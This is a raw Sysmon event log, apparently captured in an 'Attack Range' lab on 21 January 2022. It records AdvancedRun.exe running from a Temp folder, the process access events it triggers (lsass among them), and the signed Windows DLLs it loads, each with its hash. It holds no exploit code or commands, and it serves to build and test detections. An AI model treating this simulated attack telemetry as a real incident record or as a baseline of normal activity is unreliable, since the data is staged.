18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.082{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.082{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004008468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.941{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008467Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.941{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.847{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008465Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004008462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004008460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004008459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004008458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 